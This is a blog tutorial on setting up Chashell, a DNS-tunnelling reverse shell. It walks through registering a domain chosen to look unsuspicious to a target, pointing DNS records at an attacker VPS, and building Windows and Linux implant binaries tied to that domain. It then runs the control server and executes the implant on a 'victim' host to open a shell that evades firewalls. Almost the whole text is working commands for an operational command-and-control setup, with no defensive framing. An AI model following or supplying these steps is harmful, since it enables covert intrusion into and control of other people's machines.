Chashell - Reverse Shell over DNS

 Posted on February 11, 2025  |  3 minutes  |  449 words

Introduction

“Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks. It comes with a multi-client control server, named chaserv.” - https://github.com/sysdream/chashell

Domain name setup

Purchase a domain name of your choice (ideally something cheap and non-suspect to your target) then set up your DNS records as follows (replace 444.111.222.333 with your VPS IP):

A Record	chashell	444.111.222.333		5min
NS Record	c	chashell.yourdomain.xyz.	5min

Chashell installation and setup (Debian VPS)

The installation steps below are executed on a VPS (running Debian). Adapt as required for your environment.

Before commencing ensure your system is updated by running:

sudo apt update
sudo apt dist-upgrade
sudo apt install git make tmux gcc

Download chashell, golang, set golang path and install dependencies

Note: We are using an older version of golang as newer versions have dependency issues with packages such as dep and gox. Navigate to https://go.dev/dl/ to view the direct link for newer golang versions if desired

Download and install golang and set the path:

wget https://go.dev/dl/go1.15.15.linux-amd64.tar.gz
rm -rf /usr/local/go && tar -C /usr/local -xzf go1.15.15.linux-amd64.tar.gz

Edit your .profile file, then add the following to the end:

export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin

Save and then run:

source .profile
go version # to ensure go is functional

Install chashell go dependencies with:

go get -u github.com/golang/dep/cmd/dep
go get github.com/mitchellh/gox

Install chashell, configure variables and build binaries

Run the following commands to clone the chashell repo and configure the variables (including your domain details from above) and build the chashell binaries:

cd go/src
git clone https://github.com/sysdream/chashell
cd chashell
export ENCRYPTION_KEY=$(hexdump -vn6 -e'4/4 "%08X" 1 "\n"' /dev/urandom)
export DOMAIN_NAME=c.yourdomain.xyz
make build-all OSARCH="windows/amd64" && make build-all OSARCH="windows/386" && make build-all OSARCH="linux/amd64"

Download the binaries to your local system

Run the following scp command on your local machine to download the binaries from your VPS (replace user and 444.111.222.333 with your VPS OS username and VPS IP):

scp user@444.111.222.333:/user/go/src/chashell/release/* ./

Stop systemd-resolved then start chaserv (to free up port 53)

SSH back into your VPS, run the following command to stop systemd-resolved (to free up port 53 as chashell requires this for DNS functionality) and start the chashell server on your VPS:

sudo systemctl stop systemd-resolved
tmux
cd go/src/chashell/release/
./chaserv_linux_amd64

We are now ready to test the chashell binaries on our victim hosts.

Testing against victim host

Windows

Copy chashell_windows_amd64.exe to your victim Windows machine then execute to trigger the shell (as shown below):

Back on your VPS, observe the chashell server receives the shell request:

This concludes the basic setup and use of chashell. For more information refer to the official github repo at https://github.com/sysdream/chashell or feel free to contact us if you have any questions.

shells